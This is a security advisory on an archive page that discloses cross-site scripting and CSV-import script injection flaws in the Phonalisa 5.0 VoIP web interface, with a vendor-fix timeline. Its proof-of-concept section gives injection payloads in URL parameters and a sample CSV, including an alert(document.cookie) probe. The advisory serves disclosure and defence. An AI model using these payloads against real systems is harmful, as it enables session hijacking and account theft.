exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Phonalisa 5.0 VoiP Code Execution / Cross Site Scripting

Phonalisa 5.0 VoiP Code Execution / Cross Site Scripting
Posted Jul 12, 2012
Authored by Benjamin Kunz Mejri, Vulnerability Laboratory | Site vulnerability-lab.com

Phonalisa version 5.0 suffers from code execution and cross site scripting vulnerabilities.

tags | exploit, vulnerability, code execution, xss
SHA-256 | cfd00c93bb41256844e3dbe21f3900f3c36cafa696c737a4467b6b3c077f028f

Phonalisa 5.0 VoiP Code Execution / Cross Site Scripting

Change Mirror Download
Title:
======
Phonalisa v5.0 VoiP - Multiple Web Vulnerabilities


Date:
=====
2012-06-16


References:
===========
http://www.vulnerability-lab.com/get_content.php?id=526


VL-ID:
=====
526


Common Vulnerability Scoring System:
====================================
6.5


Introduction:
=============
Die Revolution Ihrer Unternehmenskommunikation. Phonalisa ist ein IP-Telefonsystem, welches
schon heute alle Ansprüche von morgen erfüllt. In Phonalisa 5 wurde Vieles noch besser gemacht!
Zu den Highlights zählen u.a. ein neues noch flexibleres Rufumleitungssystem, noch mehr
unterstützte Endgeräte und vieles mehr!

- Makeln, Weiterleiten, Rückfrage, Anklopfen, Konferenz
- Pickup von Gesprächen
- Pickup-Gruppen
- Call-Box (Wählbox) für Direktwahl eingegebener Rufnummern
- Eingabe einer Präsenz - welche im Warteschlangen-Monitor angezeigt wird (z.B. Konferenz,...)
- Zentraler Abwurfplatz
- Zentrale Anruflisten
- CLIR (Rufnummer - Unterdrückung) getrennt (extern/intern) konfigurierbar
- CLIP no screening - angezeigte Rufnummer (extern/intern) änderbar
- Rückruf bei „besetzt“/“frei“ - im internen Telefonsystem
- Integrierter Instant Messaging Server

Alle von Phonalisa unterstützten Modelle werden automatisch Konfiguriert. Phonalisa kann Endgeräte
automatisch für Sie konfigurieren. Sie müssen nur einen neuen Benutzer über die WebUI anlegen und
direkt am Telefon anmelden. Schon kann telefoniert werden.

(Copy of the Vendor Homepage: http://www.phonalisa.de/funktionen )


Abstract:
=========
The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in Phonalisa v5 VoiP Phone Application.


Report-Timeline:
================
2012-05-01: Researcher Notification & Coordination
2012-05-02: Vendor Notification
2012-05-05: Vendor Response/Feedback
2012-06-10: Vendor Fix/Patch via Update
2012-06-15: Public or Non-Public Disclosure


Status:
========
Published


Affected Products:
==================
AereA NetworX UG
Product: Phonalisa VoIP v5.0


Exploitation-Technique:
=======================
Remote


Severity:
=========
High


Details:
========
1.1
Multiple persistent input validation vulnerabilities are detected in Phonalisa v5 VoiP Phone Application.
The bugs allow remote attackers to implement/inject malicious script code on the application side (persistent).
Successful exploitation of the vulnerability can lead to session hijacking (manager/admin) or stable (persistent)
context manipulation. Exploitation requires low user inter action. When exploited by an authenticated user, the
identified vulnerabilities can result in information disclosure via error, session hijacking, access to available
phone line services, manipulated persistent context execution out of the auto route listings for sip gateways.
The vulnerabilities are located in the Routing, Fax and Groups section of the sip phone application and the
vulnerable bound parameters faxnumber or groups title.


Vulnerable Module(s):
[+] Routing - Erweiterte Parameter für das SIP-Gateway [Parameter|Wert]
[+] Fax - Fax sending > Faxnummer Input & Output Listing
[+] Groups Input & Listing - Title (Name)

vulnerable Parameter(s):
[+] faxnumber
[+] groups title
[+] routinggws-sip


1.2
Multiple non persistent cross site scripting vulnerabilities are detected in Phonalisa v5 VoiP Phone Application.
The vulnerability allows remote attackers to hijack website customer, moderator or admin sessions with high required
user inter action or local low privileged user account. Successful exploitation can result in account steal, phishing
& client-side content request manipulation.

Vulnerable Module(s):
[+] ?s=
[+] mac= & phone_type=
[+] sudo=
[+] pbx_id=

1.3
A persistent code execution vulnerability & validation bug is detected in Phonalisa v5 VoiP Phone Application.
The vulnerability allows privileged attackers to execute or inject script code on application side by
exporting/importing a manipulated .csv files. Another effect is the vulnerable listing which executes
the persistent code of the .csv unfilterted on application side.

Vulnerable Module(s):
[+] Addressbook > Contacts > Input & Output Listing

Vulnerable Module(s):
[+] Company:First & Name:Surname


Vulnerable Parameter(s):
[+] addressbookaddressbook&sudo=su


Proof of Concept:
=================
1.1
The persistent input validation vulnerabilities can be exploited by remote attackers with privileged account &
with low required user inter action. For demonstration or reproduce ...


Review: Groups Input & Listing - Title (Name)

<td>"><iframe src="Phonalisa%205%20IP%20Telekommunikationssytem%20-%20Lizenziert%20
f%C3%BCr%20AereA%20NetworX%20UG%20%28haftungsbeschr%C3%A4nkt%29%20-%20100%20Benutzer-
Lizenz3-Dateien/[PERSISTENT SCRIPT CODE])' <<="" td="">
<td>user</td>
<td>0</td>

URL: http://phone.server.de/?s=admingroups&sudo=su


Review: Fax - Fax sending > Faxnummer Output Listing

<td><input name="faxnumber" type="text"><iframe src="Phonalisa%205%20IP%20Telekommunikationssytem
%20-%20Lizenziert%20f%C3%BCr%20AereA%20NetworX%20UG%20%28haftungsbeschr%C3%A4nkt%29%20-%20100%20Benutzer
-Lizenz-Dateien/[PERSISTENT SCRIPT CODE])' <"="" style="width: 250px;"></td>
</tr>
<tr>


URL: http://phone.server.de/?s=faxsend&sudo=su


Review: Routing - Erweiterte Parameter für das SIP-Gateway [Parameter|Wert]

<td>"><iframe src="Phonalisa%205%20IP%20Telekommunikationssytem%20-%20Lizenziert%20f%C3%B
Cr%20AereA%20NetworX%20UG%20%28haftungsbeschr%C3%A4nkt%29%20-%20100%20Benutzer-Lizenz4-Dateien/a.htm" onload='alert("VL")' <<=""

td=""><td>"><[PERSISTENT SCRIPT CODE]) <</td><td><a
href="/?s=routinggws-sip&m=gws-sip&sudo=su&deleteparam=%22%3E%3C
iframe%20src%3Da%20onload%3Dalert%28%22VL%22%29%20%3C&deletevalue=%22%3E%3Ciframe%20src%3Da%20onload%3Dalert%28%22VL
%22%29%20%3C&action=delextended&extended=show&gw-title=&gw-id=10"
title="löschen" onclick="return confirm_delete();"><img
alt="entfernen" src="/crystal-svg/16/act/editdelete.png"
/></a></td></tr><tr><td>allow<
/td><td>alaw</td><td><a


URL: http://phone.server.de/?s=routinggws-sip&sudo=su



1.2
The client side cross site scripting vulnerabilities can be exploited by remote attackers with medium or high required
user inter action. For demonstration or reproduce ...

PoC:

http://phonalisa.127.0.0.1:8080/?s=monitorqueues&sudo=su%22%3E%3Ciframe%20src=a%20onload=alert%28document.cookie%29%20%3C

http://phonalisa.127.0.0.1:8080/?s=monitorqueues&sudo=su%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C

http://phonalisa.127.0.0.1:8080/?s=home&m=home&sudo=%22%3E%3Cimg%20src=http://www.vuln-lab.com/images/200911/11/i8du12ievi9fh1a9rm-
owned-headonfire.jpg%20onload=alert%28123%29;%20/%3E&setlang=en-us

http://phonalisa.127.0.0.1:8080/?s=home&m=home&sudo=%22%3E%3Cimg%20src=http://www.vuln-lab.com/images/200911/11/i8du12ievi9fh1a9rm-
owned-headonfire.jpg%20/%3E&setlang=en-us

http://phonalisa.127.0.0.1:8080/?s=provphones&m=phones&sudo=su&mac=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL
%22%29%20%3C&ip=127.0.0.1&pbx_id=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C&phone_type=%22%3E%3Ciframe%20src=a
%20onload=alert%28%22VL%22%29%20%3C

http://phonalisa.127.0.0.1:8080/&mac=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C&sudo=su§ion=
%2Fprov%2Fcisco


1.3
The file code execution vulnerability can be exploited by privileged attackers without required user inter action.
For demonstration or reproduce ...

Review: Addressbook - Contacts [Company:First name:Surname] Input & Output Listing

<tbody><tr style="line-height: 19px;">
<td>"><iframe src="Phonalisa%205%20IP%20Telekommunikationssytem%20-%20Licensed%20forA
ereA%20NetworX%20UG%20%28haftungsbeschr%C3%A4nkt%29%20-%20100%20Benutzer-Lizenz-Dateien/x.htm"
[CODE EXECUTION]' <<br="">"><[CODE EXECUTION] < "><[CODE EXECUTION]
<<br></td><td>CEO<br></td>
<td></td><td><a
href="/srv/pb-dial.php?n=000000000000" title="dial"><img
alt="dial" src="/crystal-svg/16/app/phone.png" /></a>

+490000000000<br></td><td></td><td>&
lt;/td><td><center><a


PoC: poc.csv

Surname;First name;Company;Position;Street;ZIP;City;Mobil;Private;Business;Fax;Mobil;Private;Business;Fax;E-Mail
"[CODE EXECUTION]<;[CODE EXECUTION];[CODE EXECUTION];CEO;;;;+490000000000;;;;00490000000000;;;;

URL: http://phone.127.0.0.1:8080.de/?s=addressbookaddressbook&sudo=su[CODE EXECUTION]


Risk:
=====
1.1
The security risk of the persistent input validation vulnerabilities are estimated as medium(+).

1.2
The security risk of the non persistent cross site scripting vulnerabilities are estimated as low(+).

1.3
The security risk of the persistent code execution vulnerability via csv import/export is estimated as high(-).


Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@vulnerability-lab.com)


Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply.

Domains: www.vulnerability-lab.com - www.vuln-lab.com
Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com
Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission.

Copyright © 2012 Vulnerability-Lab



--
VULNERABILITY RESEARCH LABORATORY TEAM
Website: www.vulnerability-lab.com
Mail: research@vulnerability-lab.com

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    23 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close